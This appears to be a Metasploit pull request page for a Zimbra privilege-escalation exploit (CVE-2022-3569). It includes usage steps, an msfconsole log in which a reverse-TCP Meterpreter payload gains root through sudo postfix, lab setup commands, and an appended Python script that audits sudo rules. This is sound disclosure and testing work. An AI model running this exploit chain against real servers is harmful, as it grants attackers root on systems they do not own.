CVE-2022-3569: Check in zimbra_postfix_priv_esc.rb by rbowes-r7 · Pull Request #17141 · rapid7/metasploit-framework

Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the 'zimbra' user can effectively coerce postfix into running arbitrary commands as 'root'.


Verification

List the steps needed to make sure this thing works

  • Start msfconsole

  • Get a session as the zimbra user somehow (I used exploit/linux/http/zimbra_cpio_cve_2022_41352, which isn’t merged yet, but any way to get a shell is fine)

  • use exploit/linux/local/zimbra_postfix_priv_esc

  • set SESSION <session>

  • exploit

  • Should give you root!

    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l

    Active sessions

      Id  Name  Type                   Information                Connection
      1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)

    msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
    [*] Using configured payload linux/x64/meterpreter/reverse_tcp
    msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
    SESSION => 1
    msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit

    [*] Started reverse TCP handler on 172.16.166.147:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Sending stage (3045348 bytes) to 172.16.166.157
    [*] Executing: sudo -n -l
    [+] The target appears to be vulnerable.
    [*] Creating exploit directory: /tmp/.GPjXSraCDY
    [*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
    [*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
    [*] Sending stage (3045348 bytes) to 172.16.166.157
    [+] Deleted /tmp/.GPjXSraCDY
    [*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700

    meterpreter > getuid
    Server username: root

Instructions for installing Zimbra

(Adapted from @cdelafuente-r7’s original install way back like two months ago)

Create a VM

HDD = 128gb
Memory/etc don't matter

I installed a local DNS server (note: replace <ip> with the host’s actual ip) (other note: replace apt with yum to do this on a Red Hat-derived system):

sudo apt update && sudo apt install dnsmasq
sudo hostnamectl set-hostname mail.example.org
echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf

Configure the host to use it:

sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo killall dnsmasq
sudo systemctl restart dnsmasq
echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf

Download Zimbra from https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you’ll have to sell your soul and opt-in to spam, but they don’t validate your email.

tar -xvvzf zcs-*.tgz
cd zcs*
sudo ./install.sh

* Lots of <enter>
* DO NOT install `dnscache` module (respond `N` when it asks), I had conflict issues with the local `dnsmasq`
* Yes change the system
* Setup the admin password, probably turn off auto-updates
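As an added audit check (not part of this PR or of the Metasploit module), the following Python script parses the output of `sudo -n -l` for the zimbra user, the same command the module's check runs, and reports any rule that lets a postfix binary run as root without a password; the sample output embedded below is constructed, not captured from a real host, and the rule format assumed is the standard `(runas) TAG: command` layout that sudo prints.

```python
import re

# Constructed sample of `sudo -n -l` output for the zimbra user (not taken from
# a real host). The postfix line is the sudo rule the exploit relies on.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zimbra on mail:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User zimbra may run the following commands on mail:
    (root) NOPASSWD: /opt/zimbra/common/sbin/postfix
    (root) NOPASSWD: /opt/zimbra/libexec/zmstat-fd
    (root) /usr/bin/systemctl restart zimbra
"""

# One rule line: "(runas[ : rungroup]) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Yield (runas_user, tags, command) for every rule in `sudo -l` output."""
    in_rules = False
    for line in text.splitlines():
        # Rules are listed only after this header; Defaults lines come before it.
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            runas = m.group(1).split(":")[0].strip()
            tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
            yield runas, tags, m.group(3)


def cve_2022_3569_findings(text):
    """Return commands that let the user run postfix (or anything) as root without a password."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0]
        runs_as_root = runas in ("root", "ALL")
        # "ALL" as the command covers postfix too, so it is reported as well.
        if runs_as_root and "NOPASSWD" in tags and (binary.endswith("/postfix") or binary == "ALL"):
            findings.append(cmd)
    return findings


if __name__ == "__main__":
    for cmd in cve_2022_3569_findings(SAMPLE_SUDO_L):
        print("passwordless root rule for postfix:", cmd)
```

On a live host, feed the script the real output (`sudo -n -l` run as the zimbra user) instead of the constructed sample; an empty result means no passwordless root rule for postfix was found.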
